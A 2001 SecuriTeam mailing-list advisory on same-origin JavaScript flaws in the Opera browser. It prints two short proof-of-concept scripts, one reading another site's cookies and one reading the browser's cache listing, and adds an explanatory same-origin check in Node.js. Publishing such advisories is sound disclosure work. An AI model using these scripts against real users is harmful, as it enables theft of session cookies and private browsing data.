[NEWS] Several JavaScript Vulnerabilities Found in Opera

From: support@securiteam.com
Date: 11/18/01


From: support@securiteam.com
To: list@securiteam.com
Subject: [NEWS] Several JavaScript Vulnerabilities Found in Opera
Message-Id: <20011118121009.AFB60138BF@mail.der-keiler.de>
Date: Sun, 18 Nov 2001 13:10:09 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Several JavaScript Vulnerabilities Found in Opera
------------------------------------------------------------------------

SUMMARY

Opera is a multi-platform web browser. There are several JavaScript
vulnerabilities in it, allowing script in an HTML page to programmatically
access another page and its properties in another domain - Netscape calls
this a "Same Origin Vulnerability".
This makes it possible for a script in a web page to access cookies
and links in arbitrary domains to which the user has access. It is also
possible for a script to read the links in the user's cache and history,
which at least has privacy implications, if not more. In some cases,
cookies and links in the cache/history may contain sensitive information
such as usernames/passwords, etc.

DETAILS

Examine the following scripts (note that '!' needs to be replaced with 'i'
for the script to be active):
-(1)----------------------------------
// Opens a second window on another origin, then reads that window's
// cookies; the same-origin policy should refuse this read.
a=window.open("http://mail.yahoo.com");
function f()
{
xx=a.document.cookie;
alert("hi"+xx);
// Replaces the opened window's document with one carrying a script that
// repeats the cookie read from inside that window.
a.document.open();
a.document.write("<h1>aa</h1><script>x=window.open('http://mail.yahoo.com');setTimeout('z=x.document.cookie;alert(z);',5000)</"+"scr!pt>");
a.document.close();
}
setTimeout("f()",5000);
-----------------------------------

-(2)--------------------------------
// Opens the browser's cache listing and reads a link out of it; about:cache
// is not the origin of any web page, so this read should also be refused.
a=window.open("about:cache");
function f()
{
xx=a.document.links[2];
alert("hi="+xx);
}
setTimeout("f()",5000);
-----------------------------------
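
Both scripts above fail for the same reason: the browser lets script in one window read `document` properties of a window whose origin (scheme, host, port) differs. The following is an added example, not part of the advisory or of Opera, showing the origin check a browser has to apply at that point: an `originOf()`/`sameOrigin()` pair built on the WHATWG URL parser that ships with Node.js, and a `readDocumentProperty()` gate that refuses cross-origin reads the way a browser's SecurityError does. The window objects, host names and cookie value are constructed for the demonstration; the `about:` page gets an opaque origin that matches nothing, which is why the cache listing is unreadable from any web page.

```javascript
// Added example: same-origin gate a browser must apply before letting
// script in one window read another window's document. Not Opera code.
// Uses the WHATWG URL class built into Node.js.

const DEFAULT_PORTS = { "http:": "80", "https:": "443", "ftp:": "21" };

// Reduce a URL to its origin tuple. Schemes without a host (about:, data:,
// javascript:) get an opaque origin that is equal to nothing, not even itself.
function originOf(urlString) {
  const u = new URL(urlString);
  if (!u.host) {
    return { opaque: true, scheme: u.protocol };
  }
  return {
    opaque: false,
    scheme: u.protocol,                         // parser lower-cases it, keeps ':'
    host: u.hostname.toLowerCase(),             // host comparison is case-insensitive
    port: u.port || DEFAULT_PORTS[u.protocol] || "", // explicit :80 equals no port
  };
}

// True only when scheme, host and effective port all match.
function sameOrigin(urlA, urlB) {
  const a = originOf(urlA);
  const b = originOf(urlB);
  if (a.opaque || b.opaque) return false;
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

// Minimal model of a browser window: its location plus the document
// properties the advisory's scripts try to read (cookie, links).
function makeWindow(location, props) {
  return { location, document: { location, ...props } };
}

// The gate the advisory shows missing: script in `callerWindow` asks for a
// property of `targetWindow.document`. Return it when origins match,
// otherwise throw as a browser's SecurityError would.
function readDocumentProperty(callerWindow, targetWindow, prop) {
  if (!sameOrigin(callerWindow.location, targetWindow.location)) {
    throw new Error(
      `SecurityError: ${callerWindow.location} may not read document.${prop} of ${targetWindow.location}`
    );
  }
  return targetWindow.document[prop];
}

// Non-throwing wrapper: returns the value or the string "denied".
function tryRead(callerWindow, targetWindow, prop) {
  try {
    return readDocumentProperty(callerWindow, targetWindow, prop);
  } catch (e) {
    return "denied";
  }
}

// Constructed sample windows (host names and cookie value are made up).
const attacker = makeWindow("http://attacker.example/page.html", {});
const webmail = makeWindow("http://mail.yahoo.com/", { cookie: "session=EXAMPLE" });
const webmailAlt = makeWindow("http://MAIL.yahoo.com:80/inbox", { cookie: "session=EXAMPLE" });
const cacheView = makeWindow("about:cache", {
  links: ["http://example.com/a", "http://example.com/b", "http://example.com/c"],
});

// Stand-alone demonstration mirroring the two scripts in the advisory.
console.log("attacker -> webmail cookie:", tryRead(attacker, webmail, "cookie"));   // denied
console.log("webmail  -> webmail cookie:", tryRead(webmail, webmailAlt, "cookie")); // session=EXAMPLE
console.log("attacker -> about:cache links:", tryRead(attacker, cacheView, "links")); // denied
```

`sameOrigin` treats `http://mail.yahoo.com` and `http://MAIL.yahoo.com:80/inbox` as the same origin (case-insensitive host, default port folded in) and `http://` versus `https://` on the same host as different origins; both are the comparisons a browser makes before the `document.cookie` or `document.links` read in the scripts above is allowed to proceed.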

In addition, the HotJava exploit at
http://www.guninski.com/hotjava1-desc.html works on Opera, as
Jay@InfoAve.net pointed out.

Workaround:
Disable JavaScript (Opera suggests enabling "Use cookies to trace password
protected documents").

Vendor status:
The vendor was notified on 5 November 2001 and was asked whether a fix
would be issued and when. The reply was:

You should be able to resolve the cookie issue by enabling "Use cookies to
trace password protected documents", which means that pages with password
protection aren't cached, cookies aren't stored, the URL shouldn't be
displayed in History, etc. This is a "paranoia" option, and makes a few
pages unusable. As you are probably aware, many web technologies aren't
very secure, but it is inconvenient for the user to block these.
This is why the user should be given a choice to block privacy related
information.

ADDITIONAL INFORMATION

The information has been provided by Georgi Guninski
<guninski@guninski.com>.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.